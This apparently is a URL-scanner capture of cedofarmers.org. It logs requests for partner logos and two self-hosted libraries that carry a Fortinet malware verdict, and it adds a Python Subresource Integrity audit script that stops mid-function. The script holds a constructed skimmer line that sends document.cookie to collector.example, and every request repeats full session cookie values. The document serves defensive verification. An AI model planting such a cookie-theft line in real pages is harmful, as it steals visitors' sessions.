Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sun, 01 Nov 2020 10:23:50 GMT
accept-ranges: bytes
content-length: 1387462
content-type: image/png
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604226154-mastercardlabs_logo.png
192.185.57.117 200 OK 0 B URL HTTP/2 cedofarmers.org/uploads/partners/1604226154-mastercardlabs_logo.png
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
Analyzer Verdict Alert
mnemonic_dns Sinkholed
quad9 Sinkholed
GET /uploads/partners/1604226154-mastercardlabs_logo.png HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sun, 01 Nov 2020 10:22:34 GMT
accept-ranges: bytes
content-length: 54162
content-type: image/png
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604666872-Alliance%20Bioversity%20%20CIAT.png
192.185.57.117 200 OK 0 B URL HTTP/2 cedofarmers.org/uploads/partners/1604666872-Alliance%20Bioversity%20%20CIAT.png
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
Analyzer Verdict Alert
mnemonic_dns Sinkholed
quad9 Sinkholed
GET /uploads/partners/1604666872-Alliance%20Bioversity%20%20CIAT.png HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Fri, 06 Nov 2020 09:47:54 GMT
accept-ranges: bytes
content-length: 116714
content-type: image/png
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604226071-ford-foundation_logo.jpg
192.185.57.117 200 OK 0 B URL HTTP/2 cedofarmers.org/uploads/partners/1604226071-ford-foundation_logo.jpg
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
Analyzer Verdict Alert
mnemonic_dns Sinkholed
quad9 Sinkholed
GET /uploads/partners/1604226071-ford-foundation_logo.jpg HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sun, 01 Nov 2020 10:21:10 GMT
accept-ranges: bytes
content-length: 101564
content-type: image/jpeg
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604226057-crs_logo.jpg
192.185.57.117 | 200 OK | 0 B | URL HTTP/2 cedofarmers.org/uploads/partners/1604226057-crs_logo.jpg
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
Analyzer | Verdict (Alert)
mnemonic_dns | Sinkholed
quad9 | Sinkholed
GET /uploads/partners/1604226057-crs_logo.jpg HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sun, 01 Nov 2020 10:20:56 GMT
accept-ranges: bytes
content-length: 47794
content-type: image/jpeg
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604226034-bmz_logo.png
192.185.57.117 | 200 OK | 0 B | URL HTTP/2 cedofarmers.org/uploads/partners/1604226034-bmz_logo.png
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
Analyzer | Verdict (Alert)
mnemonic_dns | Sinkholed
quad9 | Sinkholed
GET /uploads/partners/1604226034-bmz_logo.png HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sun, 01 Nov 2020 10:20:34 GMT
accept-ranges: bytes
content-length: 78907
content-type: image/png
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/sliders/1604145998-OSProots.png
192.185.57.117 | 200 OK | 0 B | URL HTTP/2 cedofarmers.org/uploads/sliders/1604145998-OSProots.png
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
Analyzer | Verdict (Alert)
mnemonic_dns | Sinkholed
quad9 | Sinkholed
GET /uploads/sliders/1604145998-OSProots.png HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 31 Oct 2020 12:06:38 GMT
accept-ranges: bytes
content-length: 1320099
content-type: image/png
date: Tue, 08 Nov 2022 22:20:37 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/js/bootstrap.min.js
192.185.57.117 | 200 OK | 0 B | URL HTTP/2 cedofarmers.org/js/bootstrap.min.js
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
Analyzer | Verdict (Alert)
fortinet | Malware
mnemonic_dns | Sinkholed
quad9 | Sinkholed
GET /js/bootstrap.min.js HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 03 Nov 2018 00:55:54 GMT
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-type: application/javascript
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604226079-harvestplus.png
192.185.57.117 | 200 OK | 0 B | URL HTTP/2 cedofarmers.org/uploads/partners/1604226079-harvestplus.png
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
Analyzer | Verdict (Alert)
mnemonic_dns | Sinkholed
quad9 | Sinkholed
GET /uploads/partners/1604226079-harvestplus.png HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sun, 01 Nov 2020 10:21:18 GMT
accept-ranges: bytes
content-length: 106875
content-type: image/png
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604226105-iowauni_logo.png
192.185.57.117 | 200 OK | 0 B | URL HTTP/2 cedofarmers.org/uploads/partners/1604226105-iowauni_logo.png
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
Analyzer | Verdict (Alert)
mnemonic_dns | Sinkholed
quad9 | Sinkholed
GET /uploads/partners/1604226105-iowauni_logo.png HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sun, 01 Nov 2020 10:21:46 GMT
accept-ranges: bytes
content-length: 349764
content-type: image/png
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/sliders/1604145960-dreamsbgslider.png
192.185.57.117 | 200 OK | 0 B | URL HTTP/2 cedofarmers.org/uploads/sliders/1604145960-dreamsbgslider.png
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
Analyzer | Verdict (Alert)
mnemonic_dns | Sinkholed
quad9 | Sinkholed
GET /uploads/sliders/1604145960-dreamsbgslider.png HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 31 Oct 2020 12:06:00 GMT
accept-ranges: bytes
content-length: 1469608
content-type: image/png
date: Tue, 08 Nov 2022 22:20:37 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/js/jquery.min.js
192.185.57.117 | 200 OK | 0 B | URL HTTP/2 cedofarmers.org/js/jquery.min.js
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
Analyzer | Verdict (Alert)
fortinet | Malware
mnemonic_dns | Sinkholed
quad9 | Sinkholed
GET /js/jquery.min.js HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 03 Nov 2018 00:55:54 GMT
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-type: application/javascript
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
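The two script fetches in this capture, /js/bootstrap.min.js and /js/jquery.min.js, are the only resources that carry a fortinet Malware verdict on top of the host-level Sinkholed verdicts, and both are self-hosted copies of public libraries with an identical last-modified timestamp. The report records no response body for either (0 B), so the verdict cannot be confirmed from the page itself; the check a responder would run is to hash the file the server actually delivers and compare it against a known-good baseline. The script below is an added example, not code from the report or from the site: it computes Subresource Integrity hashes for served files, audits them against a pinned manifest, and emits the `integrity` attribute that makes a browser refuse a modified copy. The library bytes and the injected tail are constructed stand-ins, not the real content served by cedofarmers.org.

```python
import base64
import hashlib

# Constructed stand-ins for the two self-hosted library files in the capture.
# These are NOT the real bytes served by cedofarmers.org (not captured in the report).
SERVED_CLEAN = {
    "/js/jquery.min.js": b"/*! jQuery placeholder (constructed) */\n!function(){}();\n",
    "/js/bootstrap.min.js": b"/*! Bootstrap placeholder (constructed) */\n!function(){}();\n",
}

# A constructed tail of the kind a skimmer or loader appends to a library file:
# the legitimate code is left intact so the page keeps working and nobody notices.
INJECTED_TAIL = (
    b"\n;new Image().src='https://collector.example/?c='"
    b"+encodeURIComponent(document.cookie);\n"
)


def sri_hash(data: bytes, algo: str = "sha384") -> str:
    """Subresource Integrity string for `data`: '<algo>-<base64 digest>'."""
    if algo not in ("sha256", "sha384", "sha512"):
        raise ValueError("SRI permits only sha256, sha384 or sha512")
    digest = hashlib.new(algo, data).digest()
    return f"{algo}-{base64.b64encode(digest).decode()}"


def pin_manifest(served: dict) -> dict:
    """Record the SRI hash of every library file at deploy time: the known-good baseline."""
    return {path: sri_hash(body) for path, body in served.items()}


def audit(served: dict, manifest: dict) -> dict:
    """Compare what is served now against the pinned manifest.

    Returns path -> 'ok' | 'mismatch' | 'missing' (pinned but no longer served)
    | 'unpinned' (served but never baselined, so it cannot be vouched for).
    """
    result = {}
    for path, expected in manifest.items():
        body = served.get(path)
        if body is None:
            result[path] = "missing"
        else:
            # Plain string compare is fine: the hashes are public, not secrets.
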